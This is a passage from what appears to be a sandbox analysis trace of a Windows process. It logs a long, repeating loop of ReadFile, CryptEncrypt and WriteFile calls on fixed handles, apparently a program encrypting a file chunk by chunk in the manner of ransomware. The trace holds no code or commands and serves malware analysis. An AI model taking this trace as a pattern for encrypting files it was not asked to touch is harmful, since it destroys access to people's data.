Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.135] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.136] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.136] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.136] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.136] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.136] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.137] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.137] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.137] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.137] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.138] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.138] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.138] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.138] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.138] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.139] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.139] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.139] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.139] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.139] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.140] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.140] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.140] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.140] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.141] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.141] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.141] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.141] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.141] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.142] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.142] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.142] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.142] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.142] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.142] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.142] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.143] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.143] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, 